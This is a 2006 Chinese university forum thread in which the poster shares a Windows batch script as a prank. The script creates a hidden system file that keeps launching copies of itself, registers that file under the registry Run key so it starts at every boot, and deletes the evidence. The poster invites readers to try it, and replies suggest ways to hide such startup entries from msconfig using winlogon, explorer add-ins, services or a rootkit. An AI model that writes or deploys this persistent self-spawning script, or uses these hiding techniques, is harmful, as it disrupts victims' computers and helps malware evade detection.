找回密码

碧海潮声大学生网

查看: 800|回复: 5
打印 上一主题 下一主题

〖灌水〗一个小batch.嘿嘿

[复制链接]
跳转到指定楼层
1#
发表于 2006-2-23 20:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

@echo off
echo start %systemroot%\system32\cmd.bat>>%systemroot%\system32\cmd.bat
attrib +h +s +r %systemroot%\system32\cmd.bat
echo Windows Registry Editor Version 5.00 >>%systemroot%\cmd.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%systemroot%\cmd.reg
echo "cmd"="c:\\windows\\system32\\cmd.bat">>%systemroot%\cmd.reg
regedit /s %systemroot%\cmd.reg
del %systemroot%\cmd.reg

分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩
2#
 楼主| 发表于 2006-2-23 20:51 | 只看该作者
没注册表监控软件的可以试下,很X的

3#
发表于 2006-3-2 10:41 | 只看该作者
都加到启动项了,还不明显啊?
4#
 楼主| 发表于 2006-3-2 11:06 | 只看该作者
这个配合rootkit才有生命力,加到services也比较隐藏,
没什么意义,可以理解下有些马儿的原理。 [s:2]
5#
发表于 2006-3-2 11:08 | 只看该作者
不过最好还是加在winlogon,或者是explorer的插件启动项里,这样开机即引导
,而且在常用的msconfig里不可见
6#
 楼主| 发表于 2006-3-4 11:45 | 只看该作者
这些很少见哎,加载在explorer里的见过个dll的,
regsvc32 /u下就好了,呵呵。
[s:2]
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|小黑屋| 碧海潮声大学生网  

Copyright © 2001-2013 Comsenz Inc.   All Rights Reserved.

Powered by Discuz! X3.2( 浙ICP备11026473号 )

快速回复 返回顶部 返回列表